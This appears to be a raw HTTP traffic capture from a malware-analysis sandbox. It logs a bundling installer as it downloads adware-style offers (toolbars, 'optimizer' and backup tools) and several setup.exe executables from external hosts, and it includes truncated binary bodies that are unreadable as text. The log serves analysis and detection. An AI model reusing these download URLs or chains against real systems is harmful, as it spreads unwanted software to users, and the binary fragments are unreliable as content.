Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:45 GMT
Content-Type: application/zip
Content-Length: 4152
Last-Modified: Tue, 03 Jun 2014 10:06:47 GMT
Connection: close
ETag: "538d9e37-1038"
Accept-Ranges: bytes
PK.........Y.D................images/PK.........Y.D,...I...........images/mystart-toolbar-gris.jpg}T.<........%.K....m63..f.h.s;..e...6.J.....".....R!....pR.RBEr ...?.s......]..y...}..}~?.3q...&....(.M......@.:< $......E...#...........9..T.......1(.4@......0.0.F..M..W..a.@"...j@....L....5..- &$.4.ni.#D.E..,......e.......f......-Q.!D8i1.....#sx......`....x..g..c.....,.@r........k....d6^.n3.....$...mQ....HC...........b........E!.|......... `r..E..... ........?.......SY.?.|.....l.[4...1..p^.CB.Y.s..<....s.pB...s0G...s.0. ......d/:.K.*..........5......@3 .....1..........`.lm0VV.F.&x........b......j..U..._...3..h...`K.6c.C-F&$#kc.Sk[..?......Z.iI..EK.A..Q.wI.gq.G.Z..l}.[..<Ic........E...$.....?.^.....o....@ZV...Y99yy99...$...H.....).C... I.|.R..Ka... ...P@....).R. .2H.....'.......I.B.2Pi9...K....,.[..........2...z....sYm.D<....;...k.*H.........'O..R.....]...$)...X..=.N<.!.o...%.<.A.Zg...D...J..e...8N........QkU...2..f .b?..W..........edO.....B.=.1.....d......6.7..*=.%m9.?.L.;.u ..D...a....6.......PB,ag.3...Z...9.n..kX...t.r.%..M.EBM8.>.lj1..9.....q&.FP.y..7..>.........@....B.0..|.}`......X..; ..6....L.J.".I.F'4.#..%......e.{.mK.14.A.r..uf.f*.N.."..g..-{z.Vm.....|.f.!..}.THn.v[AZMr.L.sg.../.Uk:`s.f...8...b.......4.j43_X.K.<f....P..E.....'3.X'....Zi......M.S..{d.a..O..6&3.%%8.......;F...%l9.. F.S..^..g.....[...GE<......e?..8#u.C..B7.}...}.S.yJ.v...zR...<...>........t.E|.4"..<.p..MIY....~.......g..6....6.=..\R....lp.......*.;..c...h.............7.S....S}......3 t=.U.a.....t..l.
<<< skipped >>>
GET //Styles/Softwares/e7bf26c3_mypcbackup.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:48 GMT
Content-Type: application/zip
Content-Length: 7774
Last-Modified: Tue, 15 Oct 2013 10:54:23 GMT
Connection: close
ETag: "525d1edf-1e5e"
Accept-Ranges: bytes
PK.........]OC................images/PK.........fJC..2.....T.......images/bullet-shortw.gifs.t..L.d.dh`d......#|..\.K....}EAbrvj.BRjzf........2Sl..M}.|..S32=..R...B....-S....l*.*r.rSK..*rs...*l..S..R..l.....XII...#HB.d.s~Q.....n...........................X..Y.. @......4. .7.]@..RFII...~yy.^..^~Q.....%..##]...........be......E..%..y. ~bR~i........pc......K....H,.7.3.GR..._in.\uqIPj.~..!....A....E..@.. ..V.E..%.E!..9.P..././../Pp.6S..ML....h.u..Zy...$.%.z..*.E.23S..L.,.M,..,....]....M....,......\.z.z]..KsS.J`zS.z-p..%............\....2q....yP.)..b.S.>.1.hQ........p...I?5............~......._>.......o^.z.....O.?z.....wn..y....W._.x....gN.:y....G..:x`...{v...c...[6o..a...kV.Z.b...K./Z.`...sf..9c...S&O.8................................ ?/7'; 3#=-5%9)1!>.6&:*2"<,4$8(0................................@_OWG[KSC]MUEYIQA^NVFZJRB\LTDXHP.................A.'..dd.a..P.........{...........PK.........N.C.U.?}...w.......images/mypcbackup.png}X.T.....CW....tH(...".wA..B.PBS..."H/"..).D:"E.*M.P..D@........[..Y_.9..=g...Y.....J......T.jJ..w(.f!'.?/....40...C.=.....P.C..@.n6.(...]......@t....c..%.D.......w...)2r..6H...d.rprG..Z:. ';.......PD9:.=.B.>.1B>rA...r. ..)<...c..wsu...G........!`._......A.j....^(.LHT...............@"Pa........I...D$@.,`|o^v.R.J*....B..1..)....O.OT.........8DD..........Awo....P.H/'.......mc... ......./Zw.....0....DX..._...........1.(.....(...1@y.}..........R.B.`.^Fh...Y.sDc...h....8.G.........B[[J...c..D. !.x.......TY...S.T.... .((....%....I...%..*..>n(w..X..cU. .....Fy9...T..n...-...b
<<< skipped >>>
GET //Styles/Softwares/0ba5df4c_optimizerpro2.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:47 GMT
Content-Type: application/zip
Content-Length: 65688
Last-Modified: Tue, 08 Jul 2014 14:49:06 GMT
Connection: close
ETag: "53bc04e2-10098"
Accept-Ranges: bytes
PK.........i.D................images/PK.........N.C..mT............images/optimizerpro-img.png....~.PNG........IHDR..............L......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$...
<<< skipped >>>
GET /test.html HTTP/1.1
Host: api.v2.sslsecure1.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:23 GMT
Server: Apache
Set-Cookie: vsid=903vr1639663438121596; expires=Mon, 18-Nov-2019 18:12:23 GMT; path=/; domain=api.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /betatest/mystart/mystartTb_5.4.1.4_sambamedia.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: betatest.vmn.net
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:32 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Wed, 04 Jun 2014 14:56:26 GMT
ETag: "8fbd-5362b8-538f339a"
Accept-Ranges: bytes
Content-Length: 5464760
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................@........S......................................s..........hI...........KS..............................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...hI.......J...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET //Displays/Templates/4934e143_Win_A_Banner-NoLink-DeclineLink.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:45 GMT
Content-Type: application/zip
Content-Length: 7828
Last-Modified: Mon, 03 Mar 2014 12:56:47 GMT
Connection: close
ETag: "53147c0f-1e94"
Accept-Ranges: bytes
PK.........gcD...qV...........box.html.V.n.8.}v......&E%...4.e q..@.x.e/O.%..k.TI*...'.?.P..q.d...F3g...R.....G.....\..........?..Ap.]._..O...?.HSi..JR...k.$..h..l6.gg... .......n.....S.....n.q..i.=8'...ux..h..?.....E#o.......4...@..:.\G!..Kh..*,g.......?....e.z..`...*$..m..u ..6...(...............Jc.....2....o....i6.....1AL..qA@3..c....1K.b.&k... .m..p.m..B..I4/0..d.)$ay.._P...[.Kf...A.r..1...j.... .x.....P..e.4Vs.E.D.....P.I.o.\.(sI........j<f..)...V..g,..m....6.xj....?7....`I.....2V...D.4$.J....O.......az..Rbs...ct0.G...ZH.R...)..R...@].n.. ......).L......V..6...-'hu..^.*[......u.../;.p..f..n..V.j...>e&.zBW....h..M.....V.....-/..w..j...q..X..$.m8=..........F.(`$.......)....(...<Y.i..#..h........X....`.B_R.....4.E qIy....I.w.7.p8.2U3.5.4.1G.v..:...}-...B.E[............s....t.S...u....Y9....6.C.A5#'../.&.......R".3...ZM4.....x.f2.....hd........,..7..!..vI.|...SNZ....;..,V..a.......=..L.".D^..Vfx.o..R.U..c.%.eQZ..Eh.......QXl...U...>....q.-i..Ty..1.@E.j..E.....T..u.j..U.[jC.*E...{......C.......>..-...u../..$a.....$k..z..z..6g....5.)].l.I.|=..H.V....T:..y.My..B.|&...g.&..{I?.......8<x!..P.=.p3.=.O~....W........H..B..6.....P.......?PK.........F.C.2..............close.html]PAN.0.</..09p }.f.x.G.M.."8U.".=N.E .....L2>.....'..4d.:..p..v...E.n0 .a...^2D.....u>z.Q@..N.q[ryK....].c...)...E.f.F.K.#..e..D@6R.9s..EH..8.a.W........x-KN.S...A.....G.....f.....U.3M...77.~.....fB........Eiw..9t........z.~.PK..........$C~...h...........finish.html.TM..0.=.R.....!...R.I..Jp.".8p....1....4._......j.d%.y
<<< skipped >>>
GET //Displays/Softwares/16220985_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:48 GMT
Content-Type: text/html
Last-Modified: Thu, 03 Oct 2013 10:28:07 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
1f87...............r..u...W....UEB..{..\.!..`...@i.?.!0$g.`..@.}...\`..t.L..j7UIU*.dE.3.O....>3..rp.....7..;.xq..t..vy..?w.......;8x.s...........?._N..n....w'.b....:(..n2.....eY...\.....b=w....*.|Z/................*V..v...|6)..[.nu..aqU/.8...",.u.Y..i^O..&.}}.L..v.|.^...?.jz.........?../....O.^.....I9..wZ..c=..|..E.....].r....).rYQ.;#/.t]6......}...{\y.~...b...E~]..uU.]$6.Vy.wy.ZWy.t.z9.....mV....:.:...S6.....I.O.O./&oL.|.'.>\.....Y..$ci....{Q..m.>..p.EU.......r]..b.....gF,%YVhe1-..}w.M...X...DO..;-. e....Y.....a..PV.,.\.....j.9.g...K&...Sz.3.|..*.......w{.J.Z._VY.c.H.i.yi......\..^.y...$_Lr..a..|.....^.........=vG.a..r0.......b{......V..r{.F..w...m..b(en..d3...1.....c.v{y.WTh.;gg.t......,V...........U9.V.'...U...k.....?*.....;.g~.f.....iU...,[...|.mc..Fj...Ww.X.2 &.Y.....-&.n....d..rM].....J>-.}....}....fX..(m...e.`.......t.......].WnQ....."...U.H..q.)qd.i....|.kj...L...{.^.V......V..*..6..JTb1R.Bz.......3.....}.b..UW....f.&m...v...n.....'..^.Pp.....>c.H.S..........4..$.-.$ru....2........5:1.W..Rh...|t....;.................y..>t..z......;....?.G=wi_..].../...........z.8....._..k.]5..OG.....Q".A..w.=...w6.....:>wg....C*.=v.....w.a....H<$......._...j......;.w~...%\%.:;.e....B...TX.7..gv.z.^9.............s.W.{.v.b...75/...r6..<...C..d...I..0ay../.4.......C..q..5..L6..E..Z..0...]...Y...b......!S..56G.-...#...*......0=.yg..A.]........8;..y..Ir.~.r..W.eU.....P.....Kp@s..a-.S.S..'.).".bv.q.|...=yM......<H...p$8 I...*....ky$N.FU.........s.p........7.._...?....u...q"...............BHk. t.E
<<< skipped >>>
GET //Styles/Softwares/844a2c3b_browserapp.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: application/zip
Content-Length: 734
Last-Modified: Tue, 01 Jul 2014 09:26:57 GMT
Connection: close
ETag: "53b27ee1-2de"
Accept-Ranges: bytes
PK........YE.D...=....=.......browserapp.css.S.N.1.='R.aJ......j.\@TH\z.U........l.."...I..JI.:....y...}U..:.p...- Nf....n....U......q...ki.(-u..0.>V}8..A.....w_......\'GF.H....?.4.:..e..}?.X.Y....E..._L..>..!..... .......C...R(,/...o.Hx.p.B....s.. ..0KY.=s.'...m...o..8}..Fd.$....b...... b....Y>..<&...%...Jjd....p...XQK.g... ...F.......fp.E..7S>b......"..>.it.W......k..4.E....,).<...H.dk....p.d.....^..'....=.U.v3Q5L......6B...//l.....^........R..t^...fp<I.!....Eb...G............#`/.../PK.........k3C................images/PK..........YE.D...=....=.....$....... .......browserapp.css.. .................\.5.....\.5.....PK...........k3C..............$...............images/.. .........x..,3.....7.......7.....PK......................
GET //Displays/Softwares/222ac0df_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: text/html
Last-Modified: Tue, 03 Jun 2014 10:09:14 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
16e1..............]s.H...._.C.l."(j........d[...|..W..d.).......}...`.z...lK.....y..<....n....`.n_.]R....\8..D.....E.\c...I...]4.......M.K{Q..$...c...b.T./.mQe...?.^.i.......3..Z.?..~t........U...]/.M.v...........j...*...../.j...I.....^.I..o.]...\..Z.x.r....W..0......|[..W.z]<k.....L..ey. ...\.b.[......*.l.K8.K.k.:O..SZV|......M....y....CYl\3.:.....d./..i.~...?6.*.$`......O.....h..k.].k.M......7.............K.4.....[...E1.....?3..g.l.../.Y,.Jb.....n..{$L...-.....E..]......[fe...X..K7/..*-;.*Y.....q..d?O;n.*..,...t.d.z>../VnS....j.*\l.....rC.)<..{C..t..t....~R&....'..|j_... ..ol..@n....a0..8..nz...x0..j.n..o'..r3...qx5......M4q..8.o.....m...4v.h4.._.....]0..x8..........p.%............>..W.;Vr.q......^....Y.....4.z4.]GC~..cn....E...Om..h..z...........XW..h.L.mp..C..&.qt9..}..GA?t.. .....]../.$.......I.ug..!s.M.d...`..jz......ff&I....j.~|7.....qA..L.W4.bHo..'....K.f.G.llvA..x....~.....O._...L...t.5...i8....E....V..U.a..F%.l.......P v..........*....|.C....}.I.....W.yR..e_........n..{.....2-........^....%...G.m.K...{q...<....O.........agk.,...gY/..On.........z...9..c.P.............E.{0...x..... .........nCsN.[.#.........&L..a8u.....i.\..[..x{$W....E..^h."........a..!X.K......>X....l......W.`.&...3...6.a.....vgv...8@.m.M.'8Z....|.?.SGJ..P....#9yCF....=.2@S.-..|]$K..zGu].`o../..~a......^"J...RFF^...q"4.....:...i..sO".Q.2c...9.l.\f;..%...(...s..Z..[.G....Ks#u....X....(H...I..;..r> .......'..e..lY..M...l......W...d.!..H.\.Md........0......F.f.l...7.....6...-~.....q?."..$.p*.1p..n..........N\8..V.
<<< skipped >>>
GET //Dictionaries/English.xml HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:31 GMT
Content-Type: text/xml
Content-Length: 626
Last-Modified: Fri, 12 Apr 2013 09:51:55 GMT
Connection: close
ETag: "5167d93b-272"
Accept-Ranges: bytes
<dictionary>. <installed> Installed </installed> . <installing>Installing</installing> . <installingetc>Installing...</installingetc> . <downloadError>An Error has occurred</downloadError> . <takeFewMinutes>It may take a few seconds</takeFewMinutes> . <confirmExit>Are you sure you want to exit?</confirmExit> . <installClose>Do you want to install the remaining offers?</installClose> . <welcome>Welcome</welcome> . <license>Welcome</license> . <options>Additional Options</options> . <instalando>Installing</instalando> . <finish>Finished</finish>. <downloadingetc>Downloading...</downloadingetc> .</dictionary>..
GET //Displays/Softwares/7f3e6cee_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:48 GMT
Content-Type: text/html
Last-Modified: Tue, 08 Jul 2014 14:47:05 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
f06.............._o......O1....(.u....b.I.8.`.5..`....-w7.G4.1......3K.....8.E...?..{............_.u.7..~x...o...k...|...W..w....WZ...o...~.>.z.>,....6<;[.U.c...X..e....YSw..uu...P.[W7}.._C......K...?..<q.xv........P..mp}..M..Zt.WW]..|..........k.6....s...C.>._}[\]n...;...W./X..........o...w:.af.lC.\.......s....U.).b.v....:_..t.v.>....z.....*."Ta.{.j...7 }.:>.....9-..B....7....j....Ky.._..?".JZNP..u....D1.s-P......*w..8..~......;.O.v._.y(...U...D.........nU........l......v.../..n_...y!.....w...?Zv..j.N<........|.gvh.... ...}.e...?....:\.%......}..j.wW..`.\V.l......%.MX.M.....GZ_...#)y.m...'..@...G.`...24..)......&.......{...{..2P..Z.....Ca."...%..&(..jg........`..RB.......F..Vv....... f.]...[n|....M...."../Ff.F[a...,u...|VC..-...|jf..>.,.F(.z....=......X.a.z..(i.hU..\...v..P ....C.....V..~.V.....~-$r.=.b*bKTS.,.f..#..!.p...a..#.....o..R.A..e_;Y9S..T...._..."..nXla..c..6f...)..beU..Y..J..Wl..3......r;sa..._.^....e{..M-.=. F.0`....a.4.6T.{y..vu[X....\.........Q)}p.aS.O.....Y.....4U..%.E........o....~. ...0.E.r.a.r..O.ai.JQ\..li.9....l...#.)...thA.H..$..:8.G.......U..N...n..............,.>...P...j....dmr9.5....0.h....O.....N@o)..!...... Z.1cjsC.]...%..wUY...L.T3.T?..@W.....15B.]...........e;...V.|....^!..'U.:......:%\.>|..AE...* ?KUQ/.C2m..E....#.e\.~o...D.cx.Q..w0K.H..Q>)... .. ......YP.D........,....Ci...w..8A.Nz......%JB.-..0^....@ ..h..}.....hH.$h.D.;zB.QY.co...t..j.8.......{.W<=.4..4.#..I..u....%..6...Z..^q...$R1.k.3)i.{C,....;......%&m.R..q_..X.r.>J,....$..F...?..M@.
<<< skipped >>>
GET /debug/Version/4_0_6_25/Nsis/PreRun HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:08 GMT
Server: Apache
Set-Cookie: vsid=905vr1639663281509643; expires=Mon, 18-Nov-2019 18:12:08 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<html>..<head><meta name="tids" content="a='471' b='1912' c='sslsecure1.com' d='manual_mapped'" /><title>sslsecure1.com</title>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<style type="text/css">../*RESET*/..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,th,var{font-style:normal;font-weight:normal;}ol,ul {list-style:none;}caption,th {text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym {border:0;}../*COMMON*/...wrapper {text-align: center;}...img {margin:0px; margin-bottom:-11px !important;}...wrapper table { text-align: left; margin: 0 auto; font-family: arial, sans-serif; color: #515151; font-size: 12px;.}...h-list {background: url(hXXp://i3.cdn-image.com/__media__/pics/471/top-nav-bg.gif) repeat-x left top;}...h-list li {display: inline; text-align:left;}...h-list li strong {color: #358a35;}..h2 {color: #63ad63; font-size: 14px; font-weight: bold;}../*HEADER*/..#header {border-top: 4px solid #358a35; padding-top: 8px;}..#header .cufondiv h1 a {...color: #63ad63;...font-weight: bold;...font-size: 35px;...text-decoration: none;...font-family: "ChunkFive", arial, serif;...font-weight:bold;...}..#header .normalfondiv h1 a
<<< skipped >>>
GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close
HTTP/1.1 200 OK
x-amz-id-2: wgcmSekBETb0nbN v9J08dVMcyPuhtEsezW2SLhqp02ifjh15UxVtFK2K2hYd4QEZOG7TnT3oR0=
x-amz-request-id: 02EFF118D334B900
Date: Wed, 19 Nov 2014 18:12:43 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.................................|........................................t..........0m..............p............................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...0m.......n...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:31 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416410780"
Last-Modified: Wed, 19 Nov 2014 15:26:20 GMT
Cache-Control: max-age=836
Content-Length: 11715336
Content-Type: application/x-msdownload
X-HW: 1416420751.dop005.ny2.t,1416420751.cds007.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P.....................n......-A............@........................................... ..............................p......................h................................................................................................text...<........................... .0`.data...............................@.0..rdata..8$.......&..................@.0@.bss..................................0..idata.......p......................@.0..ndata...`....... ..................@.0..rsrc...............................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E...$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q....~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX..$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>
GET //Styles/Softwares/06a50625_hq-videopro.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:49 GMT
Content-Type: application/zip
Content-Length: 725
Last-Modified: Wed, 12 Feb 2014 17:09:57 GMT
Connection: close
ETag: "52fbaae5-2d5"
Accept-Ranges: bytes
PK..........LD.GCw............hq-videopro.css.SMO"A.=C..(%\H....4.7nL........f:6]mO....nw.D\M@c.....{............Wlz:...}.....T...x.........]....H...n9::.N.[..._...!.CF?...O.....>...m...N..@.u..Z eX...<....N......y..m..L....H..F...|..7J.....y ..R.~..3..5<..%..j...hd.GP..zE.fKr..h..e....9.6..x7..X Um.x..he.-4...Q..T...&H..KM.s.....R*S.lOb.gQ%........[/...@sny/./Dq[:.7..!.....P...N.t.R.jr.....5i%.{.".....I6.....O.e.,...)^...8Vx\.*h..8..]w..:.L&.c..X..rc...W...Y....._.......z..3PK........Fv2C................images/PK............LD.GCw..........$....... .......hq-videopro.css.. ..............(../..W.(../..W.(..PK..........Fv2C..............$...............images/.. ..........O.`~...ao.W.(..ao.W.(..PK......................
GET /21/all/hqv/ca/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416403573"
Last-Modified: Wed, 19 Nov 2014 13:26:13 GMT
Cache-Control: max-age=1065
Content-Length: 12531440
Content-Type: application/x-msdownload
X-HW: 1416420761.dop005.ny2.t,1416420761.cds045.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P.....................n......-A............@.................................\:........ ..............................p......................X%...............................................................................................text...<........................... .0`.data...............................@.0..rdata..8$.......&..................@.0@.bss..................................0..idata.......p......................@.0..ndata...`....... ..................@.0..rsrc...............................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E...$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q....~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX..$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>
GET //Displays/Softwares/cb3d709d_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:49 GMT
Content-Type: text/html
Last-Modified: Wed, 12 Feb 2014 17:10:19 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
